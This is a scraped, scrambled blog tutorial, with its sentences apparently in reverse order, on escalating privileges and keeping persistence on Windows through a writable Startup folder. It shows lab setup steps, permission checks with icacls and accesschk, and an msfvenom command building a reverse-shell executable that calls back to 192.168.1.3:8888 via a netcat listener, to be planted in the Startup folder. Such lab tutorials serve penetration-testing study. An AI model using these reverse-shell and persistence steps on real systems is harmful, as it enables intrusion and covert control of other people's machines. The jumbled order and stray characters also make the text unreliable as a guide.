![]() Start a netcat listener in a new terminal and transfer the shell.exe with the help of the following command cd C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup msfvenom –p windows/shell_reverse_tcp lhost=192.168.1.3 lport=8888 –f exe > shell.exe Let’s create an executable program with the help of msfvenom. Here Read-write permission is assigned on BUILTIN\UsersĪs we know the current user owns read-write permission for the startup folder thus we can inject RAT to perform persistence or privilege escalation. accesschk.exe /accepteula "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup" ![]() The accesschk.exe is Sysinternals tool another permission checker tool. Step 3: Select Users group on the targeted system and assign Read Write or FULL Control permissions.Įnumerating Assign Permissions with IcaclsĪttackers can exploit these configuration locations to launch malware, such as RAT, in order to sustain persistence during system reboots.įollowing an initial foothold, we can identify permissions using the following command: icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"Įnumerating Assign Permissions using Accesschk.exe Click on the Edit option to assign dangerous permissions to the Users group. Step2: Access the startup folder properties and select the security option. Step 1: Navigate to the Startup directory using the following path: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp Note: Given steups will create a loophole through misconfigured startup folder, thus avoiding such configuration in a production environment. Objective: Escalate the NT Authority /SYSTEM privileges for a low privileged user by exploiting the Misconfigured Startup folder. ![]() Tactics: Privilege Escalation & PersistenceĬondition: Compromise the target machine with low privilege access either using Metasploit or Netcat, etc. This technique is the most driven method for persistence used by well know APTs such as APT3, APT33, APT39 and etc. Injecting a malicious program within a startup folder will also cause that program to execute when a user logs in, thus it may help an attacker to perform persistence or privilege escalation Attacks from misconfigured startup folder locations. Run dialog box: Windows Key + R), type shell: startupīoot | Logon Autostart Execution: Startup Folder.C:\Users\\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup.The Current User Startup folder is located here: Each user on the system has their own startup folder that executes at the user level.Run dialog box: Windows Key + R), type shell:common startup.C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp.The All Users Startup folder is found in the following path: Startup folder that functions at the system level and is accessible by all user accounts.There are two locations for the startup folder in windows. Programs saved in this folder would start up immediately once users turned on their machine. The Startup folder was a folder accessible from the Start Menu. Enumerating Assign Permissions using Accesschk.exe. ![]() Enumerating Assign Permissions using Icacls.Privilege Escalation by Abusing Startup Folder Logon Autostart Execution: Startup Folder Table of Contentīoot | Logon Autostart Execution (Mitre Attack) Logon Autostart Execution: Registry Run Keys There are two techniques to perform Logon Autostart Execution : These programs will be executed under the perspective of the user and will have the account’s associated permissions level. When a user signs in, the application linked will be executed if an item is in the “run keys” in the Registry or startup folder. Adding an application to a startup folder or referencing it using a Registry run key are two ways to do this. Windows Startup folder may be targeted by an attacker to escalate privileges or persistence attacks.
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |